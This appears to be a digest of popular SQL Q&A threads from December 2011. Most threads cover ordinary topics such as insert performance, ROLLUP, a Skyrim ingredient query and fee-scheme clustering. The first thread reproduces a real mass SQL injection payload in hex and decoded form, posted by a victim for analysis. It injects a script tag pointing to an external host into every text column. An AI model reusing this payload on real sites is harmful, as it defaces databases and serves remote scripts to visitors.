Best sql questions in December 2011

Can someone explain this SQL injection attack to me?

26 votes

I wanted to post this here as it is very much coding related and was something I had to clean up this week on one of my company's old ASP (classic) sites.

We got hit with the SQL injection attack that was run just a few days ago, but I'm scratching my head WHAT exactly the 'damage' was to the SQL server (via these SQL queries).

To be honest, I thought it was very ingenious the way this was carried out, and its my companies fault for having an old 10 year old site with little to no sanitized input.

The attack:

122+declare+%40s+varchar%284000%29+set+%40s%3Dcast%280x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e333020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f6c696c75706f7068696c75706f702e636f6d2f736c2e706870223e3c2f7363726970743e3c212d2d27272b525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d2929207768657265204c45465428525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d29292c3137293c3e2727223e3c2f7469746c653e3c7363726970742727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar%284000%29%29+exec%28%40s%29-

What it decodes to: (what I want to understand)

set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME
from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t
where c.DATA_TYPE in ('nvarchar','varchar','ntext','text')
  and c.CHARACTER_MAXIMUM_LENGTH>30
  and t.table_name=c.table_name
  and t.table_type='BASE TABLE'
OPEN Table_Cursor FETCH NEXT
FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
  EXEC('UPDATE ['+@T+'] SET ['+@C+']=''"></title>
    <script src="http://lilXXXXXXXop.com/sl.php"></script>
    <!--''+RTRIM(CONVERT(VARCHAR(6000),['+@C+'])) where
    LEFT(RTRIM(CONVERT(VARCHAR(6000),['+@C+'])),17)<>''"></title><script'' ')
  FETCH NEXT
  FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor

We've recovered a backup (pre injection) and went through the entire app and sanitized all input statements. Our server is firewalled, so no direct SQL access, however I want to know what else could be left over, and I have to admit the SQL query is over my head.

Can someone take a crack at it and explain the attack SQL for me?

APOLOGIES I UPDATED THE FULL DUMP & SQL

Just formatting it for readability will clarify a lot:

set ansi_warnings off

DECLARE @T VARCHAR(255), @C VARCHAR(255)

DECLARE Table_Cursor CURSOR FOR
    select c.TABLE_NAME, c.COLUMN_NAME
      from INFORMATION_SCHEMA.columns c,
           INFORMATION_SCHEMA.tables t
     where c.DATA_TYPE in ('nvarchar','varchar','ntext','text')
       and c.CHARACTER_MAXIMUM_LENGTH > 30
       and t.table_name = c.table_name
       and t.table_type = 'BASE TABLE'

OPEN Table_Cursor

FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE(@@FETCH_STATUS=0)
BEGIN
    EXEC ( 'UPDATE [' + @T + ']
               SET [' + @C + '] =
                     ''"></title>'' +
                     ''<script src="http://lilXXXXXXXop.com/sl.php"></script>'' +
                     ''<!--'' +
                     RTRIM(CONVERT(VARCHAR(6000),[' + @C + ']))
             WHERE LEFT(RTRIM(CONVERT(VARCHAR(6000),[' + @C + '])), 17)
                     <> ''"></title><script''
           '
         )

    FETCH NEXT FROM Table_Cursor INTO @T,@C
END

CLOSE Table_Cursor

DEALLOCATE Table_Cursor

It goes through every text column of every table and inserts some HTML into it — HTML that contains a pointer to externally-generated JavaScript.

Multiple INSERT statements vs. single INSERT with multiple VALUES

14 votes

I'm running a performance comparison between using 1000 INSERT statements:

INSERT INTO T_TESTS (TestId, FirstName, LastName, Age) 
   VALUES ('6f3f7257-a3d8-4a78-b2e1-c9b767cfe1c1', 'First 0', 'Last 0', 0)
INSERT INTO T_TESTS (TestId, FirstName, LastName, Age) 
   VALUES ('32023304-2e55-4768-8e52-1ba589b82c8b', 'First 1', 'Last 1', 1)
...
INSERT INTO T_TESTS (TestId, FirstName, LastName, Age) 
   VALUES ('f34d95a7-90b1-4558-be10-6ceacd53e4c4', 'First 999', 'Last 999', 999)

..versus using single INSERT statement with 1000 values:

INSERT INTO T_TESTS (TestId, FirstName, LastName, Age) 
VALUES 
('db72b358-e9b5-4101-8d11-7d7ea3a0ae7d', 'First 0', 'Last 0', 0),
('6a4874ab-b6a3-4aa4-8ed4-a167ab21dd3d', 'First 1', 'Last 1', 1),
...
('9d7f2a58-7e57-4ed4-ba54-5e9e335fb56c', 'First 999', 'Last 999', 999)

To my big surprise, the results are the opposite of what I thought:

  • 1000 INSERT statements: 290 msec.
  • 1 INSERT statement with 1000 VALUES: 2800 msec.

The test is executed directly in MSSQL Management Studio with SQL Server Profiler used for measurement (and I've got similar results running it from C# code using SqlClient, which is even more suprising considering all the DAL layers roundtrips)

Can this be reasonable or somehow explained? How come, a supposedly faster method results in 10 times (!) worse performance?

Thank you.

EDIT: Attaching execution plans for both: Exec Plans

Your plan shows the single inserts are using parameterised procedures (possibly auto parameterised) so parse/compile time for these should be minimal.

I thought I'd look into this a bit more though so set up a loop (script) and tried adjusting the number of VALUES clauses and recording the compile time.

I then divided the compile time by the number of rows to get the average compile time per clause. The results are below

Graph

Up until 250 VALUES clauses present the compile time / number of clauses has a slight upward trend but nothing to get too excited about.

Graph

But then there is a sudden change.

That section of the data is shown below.

+------+----------------+-------------+---------------+---------------+
| Rows | CachedPlanSize | CompileTime | CompileMemory | Duration/Rows |
+------+----------------+-------------+---------------+---------------+
|  245 |            528 |          41 |          2400 | 0.167346939   |
|  246 |            528 |          40 |          2416 | 0.162601626   |
|  247 |            528 |          38 |          2416 | 0.153846154   |
|  248 |            528 |          39 |          2432 | 0.157258065   |
|  249 |            528 |          39 |          2432 | 0.156626506   |
|  250 |            528 |          40 |          2448 | 0.16          |
|  251 |            400 |         273 |          3488 | 1.087649402   |
|  252 |            400 |         274 |          3496 | 1.087301587   |
|  253 |            400 |         282 |          3520 | 1.114624506   |
|  254 |            408 |         279 |          3544 | 1.098425197   |
|  255 |            408 |         290 |          3552 | 1.137254902   |
+------+----------------+-------------+---------------+---------------+

The cached plan size which had been growing linearly suddenly drops but CompileTime increases 7 fold and CompileMemory shoots up. As @Mikael Eriksson points out this is also the moment the plan changes from an auto parametrized one (with 1,0000 parameters) to a non parametrized one. Thereafter it seems to get linearly less efficient (in terms of number of value clauses processed in a given time) so maybe try restricting your batches to 250 and see how that compares.

Not sure why this should be. Presumably when it is compiling a plan for specific literal values it must perform some activity that does not scale linearly (such as sorting) when constructing the internal table of constants.

I tried to look at this in a debugger but the public symbols for my version of SQL Server 2008 don't seem to be available so instead I had to look at the equivalent UNION ALL construction in SQL Server 2005.

A typical stack trace is below

sqlservr.exe!FastDBCSToUnicode()  + 0xac bytes  
sqlservr.exe!nls_sqlhilo()  + 0x35 bytes    
sqlservr.exe!CXVariant::CmpCompareStr()  + 0x2b bytes   
sqlservr.exe!CXVariantPerformCompare<167,167>::Compare()  + 0x18 bytes  
sqlservr.exe!CXVariant::CmpCompare()  + 0x11f67d bytes  
sqlservr.exe!CConstraintItvl::PcnstrItvlUnion()  + 0xe2 bytes   
sqlservr.exe!CConstraintProp::PcnstrUnion()  + 0x35e bytes  
sqlservr.exe!CLogOp_BaseSetOp::PcnstrDerive()  + 0x11a bytes    
sqlservr.exe!CLogOpArg::PcnstrDeriveHandler()  + 0x18f bytes    
sqlservr.exe!CLogOpArg::DeriveGroupProperties()  + 0xa9 bytes   
sqlservr.exe!COpArg::DeriveNormalizedGroupProperties()  + 0x40 bytes    
sqlservr.exe!COptExpr::DeriveGroupProperties()  + 0x18a bytes   
sqlservr.exe!COptExpr::DeriveGroupProperties()  + 0x146 bytes   
sqlservr.exe!COptExpr::DeriveGroupProperties()  + 0x146 bytes   
sqlservr.exe!COptExpr::DeriveGroupProperties()  + 0x146 bytes   
sqlservr.exe!CQuery::PqoBuild()  + 0x3cb bytes  
sqlservr.exe!CStmtQuery::InitQuery()  + 0x167 bytes 
sqlservr.exe!CStmtDML::InitNormal()  + 0xf0 bytes   
sqlservr.exe!CStmtDML::Init()  + 0x1b bytes 
sqlservr.exe!CCompPlan::FCompileStep()  + 0x176 bytes   
sqlservr.exe!CSQLSource::FCompile()  + 0x741 bytes  
sqlservr.exe!CSQLSource::FCompWrapper()  + 0x922be bytes    
sqlservr.exe!CSQLSource::Transform()  + 0x120431 bytes  
sqlservr.exe!CSQLSource::Compile()  + 0x2ff bytes   

So it seems to spend a lot of time comparing (presumably sorting) strings. No idea to what end though.

It doesn't seem to affect the size of the query plan when I tried a query consisting entirely of duplicate rows and neither affects the order of the output of the table of the constants (and as you are inserting into a heap time spent sorting would be pointless anyway even if it did).

Are SQL GROUP BY fields commutative in all cases?

Asked on Fri, 02 Dec 2011 by Steve sql
11 votes

In a simple query the order of your GROUP BY fields makes no difference (ignoring developer legibility) to the final result.

EG: SELECT COUNT(*) FROM People GROUP BY Age, Gender will produce the same results as if the GROUP BY fields were flip-flopped.

Generally speaking, under what condition(s) does this apparent commutative property of the GROUP BY fields break down?

I'm looking for a general rule here (EG: "Any expression containing sub-expressions which depend upon one of the grouped fields")

I'm having a hard time coming up with an example of where the ordering would matter - but my gut tells me it does in some situation(s).

I think the only time it matters is when using ROLLUP to create subtotals

http://msdn.microsoft.com/en-us/library/ms189305(v=sql.90).aspx

CREATE TABLE #Prod
(
    ID INT IDENTITY(1,1),
    Cat INT,
    Size Int
)

INSERT #Prod SELECT 1,1
INSERT #Prod SELECT 1,1
INSERT #Prod SELECT 1,2
INSERT #Prod SELECT 1,3
INSERT #Prod SELECT 1,3
INSERT #Prod SELECT 1,3
INSERT #Prod SELECT 2,1
INSERT #Prod SELECT 2,2
INSERT #Prod SELECT 2,2
INSERT #Prod SELECT 2,3
INSERT #Prod SELECT 2,3
INSERT #Prod SELECT 2,3

SELECT 
COUNT(*)
FROM #Prod
GROUP BY Cat, Size WITH ROLLUP

SELECT 
COUNT(*)
FROM #Prod
GROUP BY Size , Cat WITH ROLLUP

Results from Query 1

2 1 3 6 1 2 3 6 12

(9 row(s) affected)

Results from Query 2

2 1 3 1 2 3 3 3 6 12

(10 row(s) affected)

How do I extend this query to find valid combinations of three items?

11 votes

I totally don't expect to get any answers here, but I'll try anyway.

So this came out of playing Skyrim. I wanted an easy way to look up what ingredients can be combined to make different potions/poisons so I made an Ingredient table that has an ID and a Name; an Effect table that has an ID, Name, Poison flag, and Potion flag (potion and poison are mutually exclusive); and a join table that has ID for ingredient and ID for effect.

So the way it works is every ingredient has 4 different effects, effects are repeated on mulitple ingredients. In the game you can combine 2 or 3 ingredients and the result is a potion or poison with all of the effects that are matching on at least 2 of the ingredients used. So if you use 3 ingredients and effect1 is on both ingredient1 and ingredient2 and effect2 is on both ingredient1 and ingredient3 your result will be a potion/poison that has both effect1 and effect2.

I was able to come up with a query on my own that will show every possible 2 ingredient combination that creates a potion with no poison effects. First I need to find every possible 2 ingredient combination that only has matching effects that are not "poison":

SELECT i1.UniqIngredient UniqIngredient1, i2.UniqIngredient UniqIngredient2
FROM Ingredient i1
CROSS JOIN Ingredient i2
INNER JOIN IngredientEffectJT jt1 ON i1.UniqIngredient = jt1.UniqIngredient
INNER JOIN IngredientEffectJT jt2 ON i2.UniqIngredient = jt2.UniqIngredient
INNER JOIN Effect e ON jt1.UniqEffect = e.UniqEffect AND jt2.UniqEffect = e.UniqEffect
WHERE i1.UniqIngredient < i2.UniqIngredient
GROUP BY i1.UniqIngredient, i2.UniqIngredient
HAVING SUM(e.Poison) = 0

Ingredient is cross joined with Ingredient to get every combination but because the order of the ingredients doesn't matter, I'd end up with double the results. That's why the WHERE checks i1.UniqIngredient < i2.UniqIngredient. I will only ever see each combination once and the lower ID of the 2 ingredients will always be in the 1st column. I join both ingredients to the same effect, because I only care about combinations that produce a result. Then I group them by the 2 ingredients and count up how many poison effects they share because I only want combinations that have 0 poison effects.

Then I use this result as a table that I join back to the Ingredient and Effect tables to get a list of every possible 2 ingredient combination that produces potions, and what effects each combination has:

SELECT i1.Name, i2.Name, e.Name
FROM (SELECT i1.UniqIngredient UniqIngredient1, i2.UniqIngredient UniqIngredient2
FROM Ingredient i1
CROSS JOIN Ingredient i2
INNER JOIN IngredientEffectJT jt1 ON i1.UniqIngredient = jt1.UniqIngredient
INNER JOIN IngredientEffectJT jt2 ON i2.UniqIngredient = jt2.UniqIngredient
INNER JOIN Effect e ON jt1.UniqEffect = e.UniqEffect AND jt2.UniqEffect = e.UniqEffect
WHERE i1.UniqIngredient < i2.UniqIngredient
GROUP BY i1.UniqIngredient, i2.UniqIngredient
HAVING SUM(e.Poison) = 0) il
INNER JOIN Ingredient i1 ON il.UniqIngredient1 = i1.UniqIngredient
INNER JOIN Ingredient i2 ON il.UniqIngredient2 = i2.UniqIngredient
INNER JOIN IngredientEffectJT jt1 ON i1.UniqIngredient = jt1.UniqIngredient
INNER JOIN IngredientEffectJT jt2 ON i2.UniqIngredient = jt2.UniqIngredient
INNER JOIN Effect e ON jt1.UniqEffect = e.UniqEffect AND jt2.UniqEffect = e.UniqEffect
ORDER BY i1.Name, i2.Name, e.Name

Using the same query I can find 2 ingredient poison combinations that have no potion effects just by changing the HAVING line to check e.Potion instead of e.Poison.

This is all fine and good, but when I want to introduce the 3rd ingredient that's where it gets tricky. I'm stumped. I can modify this query to check for 3 ingredients that all have the same effect, but that's not what I want. I want to find a 3rd ingredient that has a different effect in common with 1 of the ingredients.

Any help?


EDIT


Update: So after struggling with this for hours I have come up with a big, ugly, slow, hard to follow query (I actually don't even remember why I had to do that crazy join condition on the Effect table. But when I change it the whole query is 2x slower so it's actually faster the way I have it, though I don't know why...), that almost does what I want. This might just be as close as I can get, unless someone has any other ideas or sees a way to improve my new query.

SELECT DISTINCT il.Name1, il.Name2, il.Name3, e.Name
FROM
(SELECT DISTINCT i1.UniqIngredient Ingredient1, i1.Name Name1, i2.UniqIngredient Ingredient2, i2.Name Name2, i3.UniqIngredient Ingredient3, i3.Name Name3
FROM Ingredient i1
INNER JOIN Ingredient i2 ON i1.UniqIngredient < i2.UniqIngredient
INNER JOIN Ingredient i3 ON i2.UniqIngredient < i3.UniqIngredient
INNER JOIN IngredientEffectJT jt1 ON i1.UniqIngredient = jt1.UniqIngredient
INNER JOIN IngredientEffectJT jt2 ON i2.UniqIngredient = jt2.UniqIngredient
INNER JOIN IngredientEffectJT jt3 ON i3.UniqIngredient = jt3.UniqIngredient
INNER JOIN Effect e ON (jt1.UniqEffect = e.UniqEffect AND (jt2.UniqEffect = e.UniqEffect OR jt3.UniqEffect = e.UniqEffect)) OR (jt2.UniqEffect = e.UniqEffect AND jt3.UniqEffect = e.UniqEffect)
WHERE (EXISTS (SELECT 1
               FROM IngredientEffectJT jt1
               INNER JOIN IngredientEffectJT jt2 ON jt1.UniqEffect = jt2.UniqEffect
               WHERE jt1.UniqIngredient = i1.UniqIngredient 
               AND jt2.UniqIngredient = i2.UniqIngredient)
       AND (EXISTS (SELECT 1
                    FROM IngredientEffectJT jt1
                    INNER JOIN IngredientEffectJT jt3 ON jt1.UniqEffect = jt3.UniqEffect
                    WHERE jt1.UniqIngredient = i1.UniqIngredient 
                    AND jt3.UniqIngredient = i3.UniqIngredient)
         OR EXISTS (SELECT 1
                    FROM IngredientEffectJT jt2
                    INNER JOIN IngredientEffectJT jt3 ON jt2.UniqEffect = jt3.UniqEffect
                    WHERE jt2.UniqIngredient = i2.UniqIngredient 
                    AND jt3.UniqIngredient = i3.UniqIngredient)))
       OR (EXISTS (SELECT 1
                  FROM IngredientEffectJT jt1
                  INNER JOIN IngredientEffectJT jt3 ON jt1.UniqEffect = jt3.UniqEffect
                  WHERE jt1.UniqIngredient = i1.UniqIngredient 
                  AND jt3.UniqIngredient = i3.UniqIngredient)
      AND EXISTS (SELECT 1
                  FROM IngredientEffectJT jt2
                  INNER JOIN IngredientEffectJT jt3 ON jt2.UniqEffect = jt3.UniqEffect
                  WHERE jt2.UniqIngredient = i2.UniqIngredient 
                  AND jt3.UniqIngredient = i3.UniqIngredient))
GROUP BY i1.UniqIngredient, i1.Name, i2.UniqIngredient, i2.Name, i3.UniqIngredient, i3.Name
HAVING SUM(e.Poison) = 0) il
INNER JOIN IngredientEffectJT jt1 ON il.Ingredient1 = jt1.UniqIngredient
INNER JOIN IngredientEffectJT jt2 ON il.Ingredient2 = jt2.UniqIngredient
INNER JOIN IngredientEffectJT jt3 ON il.Ingredient3 = jt3.UniqIngredient
INNER JOIN Effect e ON (jt1.UniqEffect = e.UniqEffect AND (jt2.UniqEffect = e.UniqEffect OR jt3.UniqEffect = e.UniqEffect)) OR (jt2.UniqEffect = e.UniqEffect AND jt3.UniqEffect = e.UniqEffect)
ORDER BY il.Name1, il.Name2, il.Name3, e.Name

In the inner query:

FROM Ingredient i1
INNER JOIN Ingredient i2 ON i1.UniqIngredient < i2.UniqIngredient
INNER JOIN Ingredient i3 ON i2.UniqIngredient < i3.UniqIngredient

This creates every possible combination of 3 ingredients where order does not matter and nothing is repeated. Then the Joins to IngredientEffectJT and Effect... I actually don't remember what the crazy join on Effect is for. Looking at it, I thought it was to ensure an effect exists on at least 2 ingredients, but that's what the WHERE clause is doing. And simplifying that Effect join causes it to run significantly slower so...whatever.

Then the GROUP BY is there so I can count the number of matching poison effects. Since I had to group by the 3 ingredients, I lose the individual matching effects so then I need to rejoin all of those ingredients back to their effects and find the effects that match.

The problem with this query is that it will show combinations where all 3 ingredients have the same 1 effect. Those combinations are pointless because you can make the same thing by only using 2 of those 3 so it's kind of wasteful.

So, this is the best I could come up with. It's really slow so maybe I'll just save it to a new table to make it easier and faster to query again in the future.

While Martin Smith's solution does not entirely solve this problem, it did inspire me to look into using CTEs and I think I got it.

Once I realized every 3 ingredient combination is really 2 different 2 ingredient combinations that share 1 common ingredient, I decided to find all 2 ingredient combinations and then find every combination of those that have at least 1 ingredient in common and both have effects that the other does not have.

Then check to make sure every 3 ingredient combination has no poison effects (I already know each individual 2 ingredient combination has no poison effects, but just because A+B has no poison and B+C has no poison doesn't mean A+B+C won't have poison. It's possible that combing A with C will produce a poison effect).

Then I join all 3 ingredients back to the Effect table to display which effects are produced with each combination.

This query has a 3 minute 50 second execution time on my system. That's not cool. But at least I am getting the results I want now.

WITH Combination AS
(
    --Finds all 2 ingredient combinations that have shared effects that are not poisons
    select ROW_NUMBER() OVER (ORDER BY i1.Name, i2.Name) UniqCombination, i1.UniqIngredient UniqIngredient1, i2.UniqIngredient UniqIngredient2, COUNT(1) NumberOfEffects
    from Ingredient i1
    cross join Ingredient i2
    INNER JOIN IngredientEffectJT jt1 ON i1.UniqIngredient = jt1.UniqIngredient
    INNER JOIN IngredientEffectJT jt2 ON i2.UniqIngredient = jt2.UniqIngredient
    INNER JOIN Effect e ON jt1.UniqEffect = e.UniqEffect AND jt2.UniqEffect = e.UniqEffect
    WHERE i1.UniqIngredient < i2.UniqIngredient
    GROUP BY i1.UniqIngredient, i1.name, i2.UniqIngredient, i2.Name
    HAVING SUM(e.poison) = 0
),
Potion AS
(
    --Matches up all 2 ingredient combinations in the Combination CTE with the effects for that combination
    SELECT DISTINCT c.UniqCombination, c.UniqIngredient1, i1.Name Ingredient1, c.UniqIngredient2, i2.Name Ingredient2, e.UniqEffect, e.Name Effect
    FROM Combination c
    INNER JOIN Ingredient i1 ON c.UniqIngredient1 = i1.UniqIngredient
    INNER JOIN Ingredient i2 ON c.UniqIngredient2 = i2.UniqIngredient
    INNER JOIN IngredientEffectJT jt1 ON c.UniqIngredient1 = jt1.UniqIngredient
    INNER JOIN IngredientEffectJT jt2 ON c.UniqIngredient2 = jt2.UniqIngredient
    INNER JOIN Effect e ON jt1.UniqEffect = e.UniqEffect AND jt2.UniqEffect = e.UniqEffect

),
BigCombination AS
(
    --Matches 2 combinations together where 1 ingredient is the same in both combinations.
    SELECT c1.UniqIngredient1, CASE WHEN c1.UniqIngredient1 = c2.UniqIngredient1 THEN c1.UniqIngredient2 ELSE c2.UniqIngredient1 END UniqIngredient2, c2.UniqIngredient2 UniqIngredient3
    FROM Combination c1
    INNER JOIN Combination c2 ON (c1.UniqIngredient1 = c2.UniqIngredient1 OR c1.UniqIngredient2 = c2.UniqIngredient1 OR c1.UniqIngredient2 = c2.UniqIngredient2) AND c1.UniqCombination < c2.UniqCombination
    --This WHERE clause sucks because there are 2 different select queries that must run twice each.
    --They have to run twice because I have to EXCEPT 1 from 2 and 2 from 1 to make sure both combinations are contributing something new.
    WHERE EXISTS( SELECT p1.UniqEffect
                  FROM Potion p1
                  WHERE p1.UniqCombination = c1.UniqCombination
                  EXCEPT
                  SELECT p2.UniqEffect
                  FROM Potion p2
                  WHERE p2.UniqCombination = c2.UniqCombination)
    AND EXISTS( SELECT p2.UniqEffect
                FROM Potion p2
                WHERE p2.UniqCombination = c2.UniqCombination
                EXCEPT
                SELECT p1.UniqEffect
                FROM Potion p1
                WHERE p1.UniqCombination = c1.UniqCombination)
),
BigPotionCombination AS
(
    --Combinations were made only from other combinations that made potions, but it's possible the new
    --ingredients mixing together could create a new poison effect. This will remove combinations that create new poison effects
    SELECT DISTINCT c.*
    FROM BigCombination c
    INNER JOIN IngredientEffectJT jt1 ON c.UniqIngredient1 = jt1.UniqIngredient
    INNER JOIN IngredientEffectJT jt2 ON c.UniqIngredient2 = jt2.UniqIngredient
    INNER JOIN IngredientEffectJT jt3 ON c.UniqIngredient3 = jt3.UniqIngredient
    INNER JOIN Effect e ON (jt1.UniqEffect = e.UniqEffect AND (jt2.UniqEffect = e.UniqEffect OR jt3.UniqEffect = e.UniqEffect)) OR (jt2.UniqEffect = e.UniqEffect AND jt3.UniqEffect = e.UniqEffect)
    GROUP BY c.UniqIngredient1, c.UniqIngredient2, c.UniqIngredient3
    HAVING SUM(e.Poison) = 0
)

--Combinations have to be joined back to Effect again to display the effects that the potions have.
SELECT DISTINCT i1.Name Ingredient1, i2.Name Ingredient2, i3.Name Ingredient3, e.Name Effect
FROM BigPotionCombination c
INNER JOIN Ingredient i1 ON c.UniqIngredient1 = i1.UniqIngredient
INNER JOIN Ingredient i2 ON c.UniqIngredient2 = i2.UniqIngredient
INNER JOIN Ingredient i3 ON c.UniqIngredient3 = i3.UniqIngredient
INNER JOIN IngredientEffectJT jt1 ON c.UniqIngredient1 = jt1.UniqIngredient
INNER JOIN IngredientEffectJT jt2 ON c.UniqIngredient2 = jt2.UniqIngredient
INNER JOIN IngredientEffectJT jt3 ON c.UniqIngredient3 = jt3.UniqIngredient
INNER JOIN Effect e ON (jt1.UniqEffect = e.UniqEffect AND (jt2.UniqEffect = e.UniqEffect OR jt3.UniqEffect = e.UniqEffect)) OR (jt2.UniqEffect = e.UniqEffect AND jt3.UniqEffect = e.UniqEffect)
ORDER BY Ingredient1, Ingredient2, Ingredient3, Effect

given 10 functions y=a+bx and 1000's of (x,y) data points rounded to ints, how to derive 10 best (a,b) tuples?

10 votes

We build software that audits fees charged by banks to merchants that accept credit and debit cards. Our customers want us to tell them if the card processor is overcharging them. Per-transaction credit card fees are calculated like this:

fee = fixed + variable*transaction_price

A "fee scheme" is the pair of (fixed, variable) used by a group of credit cards, e.g. "MasterCard business debit gold cards issued by First National Bank of Hollywood". We believe there are fewer than 10 different fee schemes in use at any time, but we aren't getting a complete nor current list of fee schemes from our partners. (yes, I know that some "fee schemes" are more complicated than the equation above because of caps and other gotchas, but our transactions are known to have only a + bx schemes in use).

Here's the problem we're trying to solve: we want to use per-transaction data about fees to derive the fee schemes in use. Then we can compare that list to the fee schemes that each customer should be using according to their bank.

The data we get about each transaction is a data tuple: (card_id, transaction_price, fee).

transaction_price and fee are in integer cents. The bank rolls over fractional cents for each transation until the cumulative is greater than one cent, and then a "rounding cent" will be attached to the fees of that transaction. We cannot predict which transaction the "rounding cent" will be attached to.

card_id identifies a group of cards that share the same fee scheme. In a typical day of 10,000 transactions, there may be several hundred unique card_id's. Multiple card_id's will share a fee scheme.

The data we get looks like this, and what we want to figure out is the last two columns.

card_id    transaction_price       fee        fixed        variable
=======================================================================
12345      200                     22         ?            ?
67890      300                     21         ?            ?
56789      150                      8         ?            ?
34567      150                      8         ?            ?
34567      150    "rounding cent"-> 9         ?            ?
34567      150                      8         ?            ?

The end result we want is a short list like this with 10 or fewer entries showing the fee schemes that best fit our data. Like this:

fee_scheme_id       fixed     variable
======================================
1                      22            0
2                      21            0
3                       ?            ?
4                       ?            ?
...

The average fee is about 8 cents. This means the rounding cents have a huge impact and the derivation above requires a lot of data.

The average transaction is 125 cents. Transaction prices are always on 5-cent boundaries.

We want a short list of fee schemes that "fit" 98%+ of the 3,000+ transactions each customer gets each day. If that's not enough data to achieve 98% confidence, we can use multiple days' of data.

Because of the rounding cents applied somewhat arbitrarily to each transaction, this isn't a simple algebra problem. Instead, it's a kind of statistical clustering exercise that I'm not sure how to solve.

Any suggestions for how to approach this problem? The implementation can be in C# or T-SQL, whichever makes the most sense given the algorithm.

Hough transform

Consider your problem in image terms: If you would plot your input data on a diagram of price vs. fee, each scheme's entries would form a straight line (with rounding cents being noise). Consider the density map of your plot as an image, and the task is reduced to finding straight lines in an image. Which is just the job of the Hough transform.

You would essentially approach this by plotting one line for each transaction into a diagram of possible fixed fee versus possible variable fee, adding the values of lines where they cross. At the points of real fee schemes, many lines will intersect and form a large local maximum. By detecting this maximum, you find your fee scheme, and even a degree of importance for the fee scheme.

This approach will surely work, but might take some time depending on the resolution you want to achieve. If computation time proves to be an issue, remember that a Voronoi diagram of a coarse Hough space can be used as a classificator - and once you have classified your points into fee schemes, simple linear regression solves your problem.

select mysql missing columns in php

9 votes

i need to get the latest order (from our custon admin panel). here's my query:

select * 
from order 
  left join customer 
    on (customer.id = order.fk_cid) 
where date = curdate() 
order by time desc 
limit 1;

this output everything from orders and customers which i need except 1 therefore that is why i use the *

here's my table structure:

order table: 
id, fk_cid, date, time

customer table: 
id, name, lastname, street, city, zip, country, phone, email, lastlogin

now, in my php i have:

$result = mysql_query("
    select * 
    from `order` 
    left join customer 
    on (customer.id = order.fk_cid) 
    where date = curdate() 
    order by time desc 
    limit 1");
$row = mysql_fetch_assoc($result, MYSQL_ASSOC);

at this point my order is not correct, why?

Your customers.id is overwriting the order.id because you are using the same column name.

select * 
from `order` 
left join customer on (customer.id = order.fk_cid) 
where date = curdate() order by time desc limit 1;
+------+--------+------------+----------+------+-------+------
| id   | fk_cid | date       | time     | id   | name  | ....
+------+--------+------------+----------+------+-------+------
|    1 |      2 | 2011-11-30 | 07:01:23 |    2 | asasd | ....
+------+--------+------------+----------+------+-------+------
1 row in set (0.03 sec)

As you can see in this example you have two id, so PHP when retrieve the data using mysql_fetch_assoc it overwrites the second id because it's the same key in the array. To fix this, you will have to specify the columns in your query:

select `order`.id AS order_id, customer.id AS customer_id, customer.name /* etc... */

This will output:

Also, I recommend to use different name for your tables and fields. order, date, time since they are reserved word (in case you forget for use the ` ).

Array
(
    [order_id] => 1
    [customer_id] => 2
    // etc...
)

Also here's a topic you should read: Why is SELECT * considered harmful?

How can I select some amount of rows, like "get as many rows as possible in 5 seconds"?

9 votes

The aim is: getting the highest number of rows and not getting more rows than rows loaded, after 5 seconds. The aim is not creating a timeout.

First I thought of storing datetime in a variable in sql, then using a while loop with datediff, then returning a datatable from a funcion (and I am assuming it would work that way). Do you know any other way? I don't have permission to create stored procedures nor scheduled tasks.

Although the trend in recent years for relational databases has moved more and more toward cost-based query optimization, there is no RDBMS I am aware of that inherently supports designating a maximum cost (in time or I/O) for a query.

The idea of "just let it time out and use the records collected so far" is a flawed solution. The flaw lies in the fact that a complex query may spend the first 5 seconds performing a hash on a subtree of the query plan, to generate data that will be used by a later part of the plan. So after 5 seconds, you may still have no records.

To get the most records possible in 5 seconds, you would need a query that had a known estimated execution plan, which could then be used to estimate the optimal number of records to request in order to make the query run for as close to 5 seconds as possible. In other words, knowing that the query optimizer estimates it can process 875 records per second, you could request 4,375 records. The query might run a bit longer than 5 seconds sometimes, but over time your average execution should fall close to 5 seconds.

So...how to make this happen?

In your particular situation, it's not feasible. The catch is "known estimated execution plan". To make this work reliably, you'd need a stored procedure with a known execution plan, not an ad-hoc query. Since you can't create stored procedures in your environment, that's a non-starter. For others who want to explore that solution, though, here's an academic paper by a team who implemented this concept in Oracle. I haven't read the full paper, but based on the abstract it sounds like their work could be translated to any RDBMS that has cost-based optimization (e.g. MS SQL, MySQL, etc.)

OK, So what can YOU do in your situation?

If you can't do it the "right" way, solve it with a hack.

My suggestion: keep your own "estimated cost" statistics.

Do some testing in advance and estimate how many rows you can typically get back in 4 seconds. Let's say that number is 18,000.

So you LIMIT your query to 18,000 rows. But you also track the execution time every time you run it and keep a moving average of, say, the last 50 executions. If that average is less than 4.5s, add 1% to the query size and reset the moving average. So now your app is requesting 18,180 rows every time. After 50 iterations, if the moving average is under 4.5s, add 1% again.

And if your moving average ever exceeds 4.75s, subtract 1%.

